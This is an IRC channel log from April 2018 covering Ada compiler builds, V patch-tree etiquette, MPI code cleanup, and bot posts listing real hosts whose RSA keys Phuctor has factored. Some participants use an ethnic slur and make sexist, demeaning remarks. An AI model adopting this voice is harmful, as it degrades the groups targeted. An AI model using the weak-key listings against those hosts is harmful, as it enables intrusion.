dependency go away. 1806150;1524909162;a111;Logged on 2018-04-27 15:23 lobbes: Neato spyked. I'm sure I'll be putting your guide to practical use once it comes time to implement the self-voicing bit of the eventual tickerbot I'm building 1806151;1524909357;spyked;http://btcbase.org/log/2018-04-27#1805936 <-- lol, I was looking for it! but in all seriousness, I'm very happy to see thetarpit being read and generating comments. 1806152;1524909357;a111;Logged on 2018-04-27 15:36 mircea_popescu: http://btcbase.org/log/2018-04-27#1805903 << poor spyked keeps getting blindsided with this sorta item. how you holding up in there, yo 1806153;1524909370;spyked;you ain't seen nothing yet. just wait till I publish my other coads. 1806154;1524909426;spyked;http://btcbase.org/log/2018-04-27#1805942 <-- http://thetarpit.org/uploads/2018/04/gpg-uiop.lisp and can be further extended. 1806155;1524909426;a111;Logged on 2018-04-27 15:41 mircea_popescu: http://btcbase.org/log/2018-04-27#1805922 << if you're going to "--clearsign" why not "-aer uid" for the same money ? 1806156;1524909476;spyked;http://btcbase.org/log/2018-04-27#1805945 <-- /me digs the dostoievskian reference. 1806157;1524909476;a111;Logged on 2018-04-27 15:41 mircea_popescu: the crime and the punishment are indistinguishable in all divine systems. 1806158;1524910435;spyked;http://btcbase.org/log/2018-04-27#1806058 <-- hey trinque, is the deedbot rsstron parsing the input from phuctor's rss feed somehow? asking because large numbers appear abbreviated (e.g. 1471...9097) on irc, but not in the feed. 1806159;1524910435;a111;Logged on 2018-04-27 20:20 deedbot: http://phuctor.nosuchlabs.com/gpgkey/741F83D180F194CFCEBD19BAD698A5DCAE9DFFB03F14A1687DC41D44706846DD << Recent Phuctorings. - Phuctored: 1471...9097 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (mail.10gb-host.net. TH) 1806160;1524910670;spyked;also asciilifeform ^ re same, is it normal behaviour for some links to be posted twice on rss? I guess it does that when it finds >1 factors for the same key? asking because my experimental rss uses post links as IDs, so it posts at most 1 factor for a key. 1806161;1524910742;spyked;to reproduce this: search for e.g. 741F83D180F194CFCEBD19BAD698A5DCAE9DFFB03F14A1687DC41D44706846DD in http://phuctor.nosuchlabs.com/rss ; will discover that there are two -s to the same key. 1806162;1524910780;spyked;http://p.bvulpes.com/pastes/sXFVt/?raw=true <-- snapshot of phuctor rss where the above holds. 1806163;1524911289;spyked;to anticipate a potential discussion on this: phuctor's feed is actually in "Atom" format, so it does have a unique "id" tag; maybe I should be using that as an identifier (and, respectively, the "guid" tag in RSS feeds) instead of the link. 1806164;1524919285;asciilifeform;spyked: multiple factors. 1806165;1524919361;asciilifeform;spyked: though iirc on rare occasions trinque's thing rang the bell twice for same one, on account of rss being an ill-conceived hack at birth 1806166;1524929514;BingoBoingo;Holy fuckballs the "seasonally appropriate" rain has apparently arrived 1806167;1524934008;diana_coman;did anyone publish a compilation recipe for adacore's gnat on republican gentoo? searching the logs returned only various troubles and otherwise mod6's attempt as most recent from what I can tell: http://btcbase.org/log/2017-07-17#1685215 1806168;1524934008;a111;Logged on 2017-07-17 02:23 mod6: asciilifeform: yah, gentoo is looking for a package maintainer for gnat. 1806169;1524934023;mircea_popescu;in other crazy shits, inspect girl's workout agenda, encounter item "abduct. 4x 12 43kg" and shudder. 1806170;1524934039;mircea_popescu;"did she really abduct four 12yos !?" 1806171;1524934062;asciilifeform;diana_coman: afaik not! ( aside from the amply discussed sad phakt that building it requires a working gnat bin to be found somewhere else ) 1806172;1524934073;mircea_popescu;so wait a second here. 1806173;1524934091;mircea_popescu;if i want to move my eulora server from jam to gnat i am stuck... doing what ? 1806174;1524934209;asciilifeform;!#s build gnat 1806175;1524934210;a111;48 results for "build gnat", http://btcbase.org/log-search?q=build%20gnat 1806176;1524934239;mircea_popescu;spyked, http://btcbase.org/log/2016-11-17#1568940 1806177;1524934239;a111;Logged on 2016-11-17 15:06 mircea_popescu: trinque can deedbot rss parsing be unprincipledly altered so that any succession of alphanum characters in excess of 16 spaces is replaced with first4[...]last4 ? 1806178;1524934240;asciilifeform;^ ave1 has the closest thing to a turnkey process afaik. ( still requires finding a working gnat for ~some~ machine , somewhere, that already runs ) 1806179;1524934258;mircea_popescu;ave1, is this true ? can you halp ? 1806180;1524934353;diana_coman;at any rate it's not the sort of thing I'd try directly on a remote machine as it messes up with the local gcc so this will be fun 1806181;1524934384;mircea_popescu;indeed. 1806182;1524934398;asciilifeform;diana_coman: it doesn't have to screw with the machinewide gcc; can do as part of buildroot ( iirc buildroot even supports auto-building gnat the same way i built e.g. arm7 gcc with it; but requires a running gnat to be present on the machine where it is done ) 1806183;1524934418;asciilifeform;i have this on my conveyor under 'make arm gnat' but not gotten to it yet. 1806184;1524934440;mircea_popescu;incidentally, the move to uy has massively improved my personal server connection :D 1806185;1524934466;asciilifeform;neato 1806186;1524935446;BingoBoingo; incidentally, the move to uy has massively improved my personal server connection :D << Many cabling maps were consulted picking a landing spot after discovering Asia has no connectivity 1806187;1524935466;mircea_popescu;Lp 1806188;1524939737;asciilifeform;!!up her 1806189;1524939738;deedbot;her voiced for 30 minutes. 1806190;1524940016;mircea_popescu;aww 1806191;1524941460;deedbot;http://qntra.net/2018/04/shitware-today-china-toying-with-us-style-extraterritorial-jurisdiction/ << Qntra - Shitware Today: China Toying With US Style Extraterritorial Jurisdiction 1806192;1524941685;spyked;http://btcbase.org/log/2018-04-28#1806176 <-- danke! 1806193;1524941685;a111;Logged on 2018-04-28 16:50 mircea_popescu: spyked, http://btcbase.org/log/2016-11-17#1568940 1806194;1524941974;trinque;deedbot is also providing the reverse DNS and geolocation 1806195;1524942354;spyked;oh I see. but then does the 16+ alphanum shortening apply only to phuctor, or to all the feeds? 1806196;1524942459;trinque;shortening's happening on all RSS output 1806197;1524942488;spyked;ah, so only the IP parsing is phuctor-specific then 1806198;1524942562;trinque;that is, yep. 1806199;1524942805;asciilifeform;ACHTUNG phuctor readers: new pheatures. 1806200;1524942829;asciilifeform;( see bottom of http://phuctor.nosuchlabs.com/stats and from there self-explanatory ) 1806201;1524942951;asciilifeform;i'ma read comments/barfology laters; off to ffa room nao! 1806202;1524943071;mircea_popescu;you need better markup, as it is is confusing. is 3 or 4294967297 the factor shared by 2 or more moduli and which are htey. 1806203;1524943326;deedbot;http://phuctor.nosuchlabs.com/gpgkey/3BE30E12B591F6690BDBF29055AB1AB6CE960EF5DE65E88F221F11841B0B434C << Recent Phuctorings. - Phuctored: 1728...7347 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (sun.knuepfer-online.de. DE NW) 1806204;1524944127;trinque;hey folks, deedbot wallet announcement. there'll be a planned outage starting at 3pm. I'm moving infrastructure over to a new location, with what I expect to be a more reliable fiber connection. 1806205;1524944177;trinque;wallet commands will be unavailable for 1-2hrs, after which I'll announce when reconnected. 1806206;1524944387;deedbot;http://phuctor.nosuchlabs.com/gpgkey/1A370819468076DDC074DBF03D7E49D9B18948C74CD6DA704E58679EE4993425 << Recent Phuctorings. - Phuctored: 1767...6289 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (mail.victormarins.com.br. BR) 1806207;1524952553;deedbot;http://phuctor.nosuchlabs.com/gpgkey/3BE30E12B591F6690BDBF29055AB1AB6CE960EF5DE65E88F221F11841B0B434C << Recent Phuctorings. - Phuctored: 1367...8153 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (sun.knuepfer-online.de. DE NW) 1806208;1524953034;deedbot;http://qntra.net/2018/04/tick-tock-still-dead-intel-remains-stalled-out-at-14-nm-node-process-another-year/ << Qntra - Tick Tock Still Dead Intel Remains Stalled Out At 14 nm Node Process Another Year 1806209;1524954004;deedbot;http://qntra.net/2018/04/even-locked-microsoft-windows-computers-vulerable-to-bsod-crash-on-usb-insertion/ << Qntra - Even "Locked" Microsoft Windows Computers Vulerable to BSOD Crash On USB Insertion 1806210;1524954245;trinque;wallet is back online. 1806211;1524954382;BingoBoingo;ty trinque 1806212;1524954382;mod6;hola 1806213;1524954392;*;mod6 reads scrollback 1806214;1524954741;deedbot;http://phuctor.nosuchlabs.com/gpgkey/1A370819468076DDC074DBF03D7E49D9B18948C74CD6DA704E58679EE4993425 << Recent Phuctorings. - Phuctored: 1551...2983 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (mail.victormarins.com.br. BR) 1806215;1524955031;mod6;Cool, trinque: thank's for the notice. 1806216;1524955688;deedbot;http://qntra.net/2018/04/chilean-state-bank-and-chilean-branch-of-itau-suffer-pre-trial-loss-against-local-bitcoin-exchange-over-account-closures/ << Qntra - Chilean State Bank And Chilean Branch Of Itau Suffer Pre-Trial Loss Against Local Bitcoin Exchange Over Account Closures 1806217;1524955927;mircea_popescu;!!key mocky 1806218;1524955929;deedbot;http://wot.deedbot.org/D6EC973F1D3C91CC1DD0AD43CF32BD2C54C2F93D.asc 1806219;1524956746;phf;http://btcbase.org/log/2018-04-26#1805634 << i emailed chromeunboxed.com guy "Robby Payne" on recommendation "they will know", haven't heard anything back. actually first time i cold called an online "specialist", not going to try that again 1806220;1524956746;a111;Logged on 2018-04-26 15:28 asciilifeform: http://btcbase.org/log/2018-04-26#1805578 << article updated; possibly 1st time querying ( believe or not... ) reddit, yielded up a useful seekrit 1806221;1524957282;mircea_popescu;why not ? 1806222;1524958314;asciilifeform;phf: if it wasnt clear -- problem is solved, i have the machine going 1806223;1524958338;asciilifeform;( not ready for primetime yet, but it boots my kernel ) 1806224;1524958681;phf;mircea_popescu: i'm not sure what i was trying to say there. that's not the first time i cold emailed someone, and also not the last one. i'm just making sure s/n doesn't stay too high 1806225;1524958705;phf;asciilifeform: aha, i figured 1806226;1524958740;mircea_popescu;we thank you for your contribution! 1806227;1524959096;deedbot;http://trilema.com/2018/lord-mp-of-tmsr-and-the-plebeian-princess-club/ << Trilema - Lord MP of TMSR and the plebeian princess club. 1806228;1524966959;mod6;pfff http://btcbase.org/patches/genesis#L23074 1806229;1524988917;deedbot;http://phuctor.nosuchlabs.com/gpgkey/4DCE34604792B60B9F04078F9C6740D6D40919ABBD98371729DC9C886F642600 << Recent Phuctorings. - Phuctored: 1463...5277 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (smtp.cmi.edu. MH) 1806230;1524996559;ave1;I've been working on getting a arm 64bit cross compiler + a cross compiled arm 64bit compiler, http://btcbase.org/log/2018-04-28#1806178 1806231;1524996559;a111;Logged on 2018-04-28 16:50 asciilifeform: ^ ave1 has the closest thing to a turnkey process afaik. ( still requires finding a working gnat for ~some~ machine , somewhere, that already runs ) 1806232;1524996611;ave1;Unfortunately, It has taken weeks (a clean build takes a couple of hours + multiple small bugs had to be solved) 1806233;1524996651;ave1;Currently I'm building the final version (I hope, I was thinking the same thing a couple of days ago) 1806234;1524996683;ave1;When done + test that the cross compiled gcc actually works on an arm system I will publish. 1806235;1524996849;ave1;I found out that GNAT 2016 has some support for arm 64bit, but for android and ios and not for linux. So I had to do some small patching (I also looked at the 2017 version and I still could not find plain linux support in the adacore gnat) 1806236;1524997076;deedbot;http://phuctor.nosuchlabs.com/gpgkey/4DCE34604792B60B9F04078F9C6740D6D40919ABBD98371729DC9C886F642600 << Recent Phuctorings. - Phuctored: 1424...2497 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (smtp.cmi.edu. MH) 1806237;1524997613;deedbot;http://phuctor.nosuchlabs.com/gpgkey/5407C921960C226B72AD1A87AACD2DF4AD54112E25349CF9BC9269DB68BC5455 << Recent Phuctorings. - Phuctored: 1394...1269 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (static-188-137-98-146.leon.com.pl. PL) 1806238;1524998694;deedbot;http://phuctor.nosuchlabs.com/gpgkey/65C32EBD426FD78D653C4C9440E3A55EEAE2217F0927439B58004887BE33AA33 << Recent Phuctorings. - Phuctored: 1480...0313 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (strenge.itb-web.de. DE) 1806239;1525000840;deedbot;http://phuctor.nosuchlabs.com/gpgkey/AF8E81CF2FB7DFD3D4056C81E7E74104EE2B0918158FDB623CE02EC30621B31A << Recent Phuctorings. - Phuctored: 1571...8017 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (10441.ovz-ssd2.hc.ru. RU) 1806240;1525003122;diana_coman;that sounds good ave1, looking forward to reading the post on it, when ready 1806241;1525009187;esthlos;asciilifeform diana_coman: are the secure memory portions of MPI useful/worth their weight? 1806242;1525009808;asciilifeform;esthlos: imho absolutely not; i haven't built a linix box with swapping to disk enabled, in decade+ ( 'secure alloc' simply means 'marked unswappable' ) 1806243;1525009823;asciilifeform;*linuxbox 1806244;1525009940;asciilifeform;i suspect that swapping only even exists as a possibility in current day os because of wreckers. 1806245;1525009986;esthlos;cool, I may make a patch which rips it out. 1806246;1525010024;asciilifeform;esthlos: it was gonna, then barfed and abandoned mpi 4evah 1806247;1525010059;asciilifeform;( i have no intention of ever building anything whatsoever on it , myself ) 1806248;1525010145;asciilifeform;http://btcbase.org/log/2018-04-28#1806202 << how wouldja change the markup? i thought it was pretty clear, on http://phuctor.nosuchlabs.com/factors page, that you click the modcount to get the page of that factor , with detail 1806249;1525010145;a111;Logged on 2018-04-28 19:17 mircea_popescu: you need better markup, as it is is confusing. is 3 or 4294967297 the factor shared by 2 or more moduli and which are htey. 1806250;1525010252;asciilifeform;( they are sorted by # of mods that contain said factor, i.e. the middle column, the clickable one ) 1806251;1525010325;diana_coman;esthlos, no such thing as secure memory really 1806252;1525010328;asciilifeform;at some point in near future i'ma add annotations per factor (e.g. 'debian', 'mikrotik', etc ) 1806253;1525010363;asciilifeform;diana_coman: it was a specific chumpatronic term used by koch et al 1806254;1525010423;diana_coman;asciilifeform, aha; and not of much use really 1806255;1525010431;asciilifeform;0 use 1806256;1525010436;diana_coman;esthlos, eucrypt does not use this "secure" ; as per http://www.dianacoman.com/2017/12/28/eucrypt-chapter-3-miller-rabin-implementation/#selection-153.194-153.864 1806257;1525010466;asciilifeform;( don't build boxes with swap! it is riotously stupid thing to do, full stop ) 1806258;1525010894;esthlos;so let's say I remove the "secure" bits of MPI code for the sake of honesty. is this a needless complication of the eucrypt vpatch tree? 1806259;1525011046;asciilifeform;how can removal of crud be 'complication' ?! 1806260;1525011135;diana_coman;esthlos, well, it ultimately depends on your vpatch (what it does *exactly*), neh? chopping off some unused and moreover useless parts is valuable but a. it needs to be done making sure that nothing breaks b. mpi is and will still be a pile of shit 1806261;1525011163;diana_coman;(we don't have anything else to use so use the pile of shit, yes) 1806262;1525011325;esthlos;if I make decrudification a patch on the genesis, probably requires no changes to eucrypt vpatch tree. but if it's a new genesis, tree breaks, no? 1806263;1525011414;diana_coman;hm, why new genesis, I don't follow? 1806264;1525011488;esthlos;because "crud never existed" might be simpler than "here is crud, now let's remove it" 1806265;1525011490;asciilifeform;wtf, why would you put it on genesis, rather than diana_coman's proggy 1806266;1525011504;diana_coman;basically if you change something on which existing patches depend then it breaks, yes; why not put it on existing fully-pressed tree though? 1806267;1525011527;asciilifeform;esthlos: yer missing, i suspect , whole point of v 1806268;1525011539;esthlos;asciilifeform: very possible 1806269;1525011558;diana_coman;esthlos, there is no such thing as "crud never existed" ; we are not re-writing history here wtf 1806270;1525011588;diana_coman;it existed and it costs (A LOT) and we are pointedly and in-your-eyes-as-visible-as-possible nuking it whenever we can 1806271;1525011728;asciilifeform;esthlos: when folx do as you described, it is called 'regrind' and is very labour-intensive, and is never done without a substantial reason 1806272;1525012642;mircea_popescu;asciilifeform, you added a new link (on stats page). if someone clicks on that link, he is regaled with a list of unlabeled numbers. 1806273;1525012695;mircea_popescu;esthlos, you wouldn't make it a patch on genesis unless you were trying to signal your disdain for diana_coman 's work so far. 1806274;1525012871;mircea_popescu;and while "crud never existed" may be tempting from the hallucination-as-font-of-reality pantsuit perspective, it is nevertheless not actually the case. 1806275;1525013020;asciilifeform;mircea_popescu: the column headers do not show in yer browser ? 1806276;1525013053;asciilifeform;( it should read 'factor / # M / when found ' ) 1806277;1525013117;mircea_popescu;asciilifeform, i see exactly as archive sees it : https://archive.is/rMv67 1806278;1525013179;asciilifeform;this is the correct picture. i'ma add a legend on top of the tbl. 1806279;1525013209;asciilifeform;( 'factor' pgs also, i suspect, could use one ) 1806280;1525013256;mircea_popescu;the fact that colors alternate by2's which is not necessarily appropriate also adds to the confusion. 1806281;1525013293;esthlos;hmm, I did not realize that patching the genesis directly would have those effects on diana_coman 's work 1806282;1525013303;asciilifeform;hmm yea this doesn't fit the style of the other pgs, i'ma make it 1 colour 1806283;1525013337;asciilifeform;esthlos: do you understand that v, deliberately and as a fundamental design choice, has no merging ? 1806284;1525013355;mircea_popescu;esthlos, it's very centrally how the v mechanism is intended to / works : you get to opt which patch trees to continue, much like in the case of bitcoin. 1806285;1525013365;esthlos;asciilifeform: this is where, I think, I failed 1806286;1525013392;asciilifeform;esthlos: picture if you substituted a different block for block#2 of bitcoin. 1806287;1525013447;asciilifeform;( yes, you can 're live history' from 2009, but will have to do it... alone ) 1806288;1525013450;mircea_popescu;don't be too harsh on self ; item is deliberately made in such a way that not-quite-coincidentally is SO VERY CONTRARY to "common wisdom", unwrapping all the corners into head takes a while. 1806289;1525013468;mircea_popescu;asciilifeform, LARPthereum! from mit cgi labs! 1806290;1525013477;esthlos;haha 1806291;1525013482;asciilifeform;verily 1806292;1525013490;mircea_popescu;you are not alone, for a big tent's there with you, and all the dumb chicks nobody wants and and aaaaand. 1806293;1525013507;asciilifeform;naa they're each in own puptent 1806294;1525013512;mircea_popescu;shhh. 1806295;1525013518;mircea_popescu;terroristms. 1806296;1525013613;esthlos;aha, so if I want to patch "as close to genesis as possible" the mpi lib, AND I want this patch to be used in diana_coman 's proggy, the ONLY choice is to patch current leaf of diana_coman 's proggy 1806297;1525013639;asciilifeform;esthlos: correct 1806298;1525013656;esthlos;ok ok, one cockroach killed? 1806299;1525013697;asciilifeform;esthlos: i recommend to take vtron and experiment with it until you grasp how it works, it will click in your head quickly 1806300;1525013711;mircea_popescu;iirc he even wrote a lisp one. 1806301;1525013729;asciilifeform;then i admit i'm a bit surprised 1806302;1525013743;esthlos;I did, but did not mess with it enough, apparently 1806303;1525013761;asciilifeform;( it is apparently possible to write a vtron, and not know what happens when you orphan a branch.. ) 1806304;1525013799;mircea_popescu;esthlos, did you see the recent discussion re polardbeard's sad failure to participate ? 1806305;1525013820;esthlos;no, was this in past few days? I'm behind 1806306;1525013884;mircea_popescu;yes, it was. to summarize, careful what you do with your patches, in the following sense : if diana_coman doesn't CONTINUE your patch, it will have to be reground later. as she's a human being with other problems and interests than folding in your alt universe, it helps IMMENSELY if you make your patches small and readable. 1806307;1525013919;mircea_popescu;if instead you fall into the other mental pit of pantsuit, where you go off by self for lengthy interval and come back with an intricately complex crystal of perfect beauty, odds are it'll get ignored for lack of time to appreciate it. 1806308;1525014020;mircea_popescu;asciilifeform, hard to pick the relevant transforms from the box, what can i say. if this weren't the case "computer security" would be more akin hygiene. 1806309;1525014027;mircea_popescu;ie, widely practiced successfuly. 1806310;1525014070;*;asciilifeform was recently reading a very spiffy history of vectorism, from w.r.hamilton up, and noticed that ~same 2 problems befell 19th c maths folx 1806311;1525014106;asciilifeform;lotta orphaned chains. grassman's, for instance, 1806312;1525014107;asciilifeform;. 1806313;1525014176;mircea_popescu;indeed. 1806314;1525014185;mircea_popescu;historically, it was the ~only incentive to publish 1806315;1525014197;mircea_popescu;contrary to the counterfactual reality us shyster constructed, "copyrights" bs. 1806316;1525014218;*;asciilifeform bbl, meat 1806317;1525014396;esthlos;mircea_popescu: I will watch for that. Last thing I want to do is to waste anyone's time 1806318;1525014431;esthlos;(including my own) 1806319;1525014485;mircea_popescu;especially. minigame is working on adding some fg code to eucrypt as it is, she'll prolly include your stuff if she can, so there you go. make it small, make it readable, start with one thing at a time and so on. 1806320;1525016482;zx2c4;mircea_popescu: http://btcbase.org/log/2018-04-23#1804912 O_o 1806321;1525016482;a111;Logged on 2018-04-23 22:05 mircea_popescu: !!key zx2c4 1806322;1525016556;zx2c4;ckang: http://btcbase.org/log/2018-04-16#1800642 1806323;1525016556;a111;Logged on 2018-04-16 22:56 ckang: oh just reading, wireguard guy got upset? 1806324;1525016567;zx2c4;oh, no, not at all -- just popped out fora few days 1806325;1525016573;zx2c4;and then got super busy 1806326;1525016690;mircea_popescu;cheers. 1806327;1525016749;mircea_popescu;i'll grant it's a little difficult to guess what's going on from far away. if you don't say anything people are going to eventually assume something random. 1806328;1525017903;mod6;mornin' 1806329;1525020293;ben_vulpes;https://text.npr.org/s.php?sid=606716569 "A lack of a trauma center was a severe indication of the institutional racism that existed on the South Side" and clearly not an indicator of the penury of the locals 1806330;1525020613;mircea_popescu;well, in their alt-universe poverty is also someone else's fault. 1806331;1525020641;mircea_popescu;nobody is poor because they're fucking stupid and generally worthless ; they're poor because i'm mean or some dumb shit like that. 1806332;1525020930;ben_vulpes;i'm curious who's going to pay the 48MM 1806333;1525021042;mircea_popescu;china via the fed credit. 1806334;1525021072;mircea_popescu;us has succeded in its aspiration to be argentina. it exists as a pretend-country on the basis of foreign capital markets. 1806335;1525021112;mircea_popescu;the whole "copyright" bs is very much equivalent to "los malvinas son argentinas", and other commercial claims they do not have. 1806336;1525022180;deedbot;http://qntra.net/2018/04/german-antisemitism-kaiser-unsurprised-by-jewish-desire-for-new-exodus/ << Qntra - German "Antisemitism" Kaiser Unsurprised By Jewish Desire For New Exodus 1806337;1525022259;BingoBoingo;If only there were still a prediction market that could be used for evaluating the proposition "Schengen Exit Visas When?" 1806338;1525022438;BingoBoingo;In other news the hostel this weekend is full. The staff helpfully let me know in advance so I could prepare. Given it is Autumn and the weather this weekend is biased towards torrential downpours I wondered "Who would be vacationing here at a time like this?" 1806339;1525022465;BingoBoingo;Turns out the answer is a bunch of Irish potato nigger "English Teachers" doing a visa run from Argentina. 1806340;1525022492;mircea_popescu;heh 1806341;1525022525;mircea_popescu;iirc i overstayed my visa by about two years. 1806342;1525022713;BingoBoingo;Their answer to that point is that "the company" cares. They aren't very clear on that leading me to suspect they are human trafficking chattel brought in on a sort of year long vacation package which gives them an allowance while "the company" milks the money from the "teaching" on at least a couple sides. 1806343;1525023073;mircea_popescu;seems the likely arrangement. 1806344;1525023183;BingoBoingo;Anyways, turns out Irish girls are getting fat like estadounidense girls circa 2010 1806345;1525023492;mircea_popescu;and in other "holy shit these people", flour bag comes with apple pie recipe. which is just as well cuz gals just baked one. the flour bag recipe calls for... 3-4 apples, HALF A POUNT OF BUTTER and two.5 cups flour. 1806346;1525023514;mircea_popescu;back at reality ranch, pie dough out of a pound of butter takes like 2kgs of flour, and is enough to feed a whole regiment two days. 1806347;1525023516;BingoBoingo;But how many feet! 1806348;1525023666;mircea_popescu;and in further ai lulz, https://www.google.com/search?tbs=sbi:AMhZZisI2p_1xUR_19DlHwJnT0L_1Jcz3NLVMmQtJ3lUFkMeRIXF3BzZK-KmjBXXjqw9oxlUP7etH2IhGTaQtS-AodWDbe4itMmHc6wRfikU3LJTW5sVQ0wk-lpnU7-Wx_1PD0JcnbQHooBzm6ANzy4AY_1JU6VqnUq02l8y3or5oBZforK340aqIZlqsyA-rxmsxWrpJv4qWD34BoZYWirTzhpj_15k9qSQm1HqCxIk8GfgEYPsU3FMG0uQHcc3H-A4iGjDa_1K3uBF4tj7oTixZFoa3IlJBWNjxhU5KK4IQhmb1voc--YI1JJFGNxc-Kl4_1TQJlqcCkapnP11KseH91QVl9saKKswa1Tvjg&btnG 1806349;1525023666;mircea_popescu;=Search%20by%20image 1806350;1525023719;mircea_popescu;very fucking totally "girl", ty wikipedia, merriam-webster and indistinct jumble of entirely unrelated messes. AI PREVAILS! 1806351;1525023759;mircea_popescu;"heart opening" fucking yoga jesus f christ. essentially the future function of google will be as pantsuit-rappropiation-engine, "here's spurious associations of our irrelevant crap to actually interesting things you may understandably be interested about". 1806352;1525023797;mircea_popescu;sort-of like how soviet library would offer you "lenin's writings on tensors" if you were looking for anything done by imperialist-burgeois authors in the field. 1806353;1525023893;mircea_popescu;meanwhile the pantsuit notion of "girl" is relevant in this world, or attaches to my chattels, exactly in the sense and to the degree cate blanchett is relevant to elizabeth the 1st. 1806354;1525024084;asciilifeform;mircea_popescu: ~would have~ offered 'lenin's writings on tensors', if stalin had not exterminated every likely perpetrator of this ( after http://btcbase.org/log/2017-12-24#1757902 incident ) 1806355;1525024084;a111;Logged on 2017-12-24 16:11 asciilifeform: kurchatov, supposedly, sat and thought, and few minutes later answered, 'perhaps from philosophical pov this'd be consistent. but then we will have to forget about obtaining the bomb.' 1806356;1525024102;mircea_popescu;!!rate mocky 1 kyla glovendangle. no, seriously. 1806357;1525024104;deedbot;Get your OTP: http://p.bvulpes.com/pastes/aBxoh/?raw=true 1806358;1525024123;mircea_popescu;asciilifeform, would have. 1806359;1525024160;asciilifeform;( lulzily/apropos , asciilifeform was last night in u.of.md. library, and there was poster ~proudly~ advertising their ongoing 'transformation from storage space for books into activity space for students' -- approx exact words ) 1806360;1525024181;asciilifeform;accompanied by 'and here is what we instead spent on ONLINE JOURNALS!' 1806361;1525024943;mircea_popescu;ncie huh 1806362;1525024947;mircea_popescu;everything in the zone gotta be a dorm. 1806363;1525024980;asciilifeform;in other quasi-noose, heathen node walker ( https://archive.li/FHKym today's snapshot ) reports 11 advertised trb nodez, with 9 of'em at tip-top of currentchain . iirc of the 9, 2 are actually 1 BingoBoingo box. still seems like 'aggression' worx pretty well. 1806364;1525024993;mircea_popescu;word. 1806365;1525027417;mod6;The foundation's is nearly caught up as well, adding another to the list. 1806366;1525027548;trinque;my pizarro node's about 90k from the top, getting there 1806367;1525027575;mod6;nice! 1806368;1525038928;mircea_popescu;meanwhile at the hunt, https://78.media.tumblr.com/e5283747bbee343037934ea4a76dd258/tumblr_n8hdf5XwZZ1qj6d3fo1_1280.jpg 1806369;1525039567;zx2c4;mircea_popescu: by the way ive wanted to dig this up for you the last two weeks and keep forgetting 1806370;1525039581;mircea_popescu;hm ? 1806371;1525039619;asciilifeform;!Q later tell trinque deedbot seems to have skipped a number of phuctor rss ticks today 1806372;1525039619;lobbesbot;asciilifeform: The operation succeeded. 1806373;1525039634;zx2c4;re:your ECC skepticism and RSA-love -- a while back the NSA changed the Suite B recommendations to partially remove ECC for new crypto systems and also removed P256 IIRC. There was a great paper analyzing what the possible motivations could be, i think called 'an enigma inside a riddle' or something goofy like that. Let me find it... 1806374;1525039664;zx2c4;here we go -- https://eprint.iacr.org/2015/1018.pdf 1806375;1525039701;zx2c4;enjoyable to read conspiracy theorizing from well qualified academics 1806376;1525039748;mircea_popescu;zx2c4, http://btcbase.org/log/2016-05-10#1465484 1806377;1525039748;a111;Logged on 2016-05-10 18:09 asciilifeform: http://eprint.iacr.org/2015/1018.pdf << related. 1806378;1525039773;zx2c4;ahh you saw this then 1806379;1525039786;mircea_popescu;some people enjoy it (called "entomological interest", here). i'm rather of the opposite persuasion, as detailed in http://trilema.com/2014/how-to-deal-with-pseudoscience/ 1806380;1525039793;mircea_popescu;ie, couldn't care less what the wankers wank. 1806381;1525039823;asciilifeform;if only even the wanks had any variety. but nope, always ~same 1806382;1525043339;deedbot;http://phuctor.nosuchlabs.com/gpgkey/81BE3B046D1B2FC0E035C9A15F562CFACB119A7AE4935B69F3F2D3C1CB4348F9 << Recent Phuctorings. - Phuctored: 1395...1003 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (lvps87-230-86-164.dedicated.hosteurope.de. DE NW) 1806383;1525047115;deedbot;http://phuctor.nosuchlabs.com/gpgkey/7F650EE9731D074E709AA535905D524450DF957951813422A481CB0FDDCC0D55 << Recent Phuctorings. - Phuctored: 1659...5127 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown DE) 1806384;1525049778;pinochle;I've completed an implementation of http://trilema.com/2018/trilema-poker-bot-spec/ ; In an effort to not barf all over the logs, I have it up and running in a separate channel for demonstration. Any lord interested in playing some hands can join #polkaroom 1806385;1525049795;mircea_popescu;o.O 1806386;1525050200;pinochle;mp, can I interest you in a game? 1806387;1525050393;mircea_popescu;you can't ; because i don't know you. did you see http://btcbase.org/log/2018-04-20#1803676 ? 1806388;1525050393;a111;Logged on 2018-04-20 16:38 ben_vulpes: pinochle: reg a key and build a name now, lest you build the thing and nobody uses it because who is this person 1806389;1525052704;pinochle;yes, point taken 1806390;1525052953;mircea_popescu;so who are you, anyway ? 1806391;1525053315;pinochle;in the past I worked as a trader ; studied probability in school ; current work is building predictive models, often an exercise in futility 1806392;1525053380;pinochle;so much noise 1806393;1525053389;mod6;!~later tell jurov Please check the ML pipes, I think I got 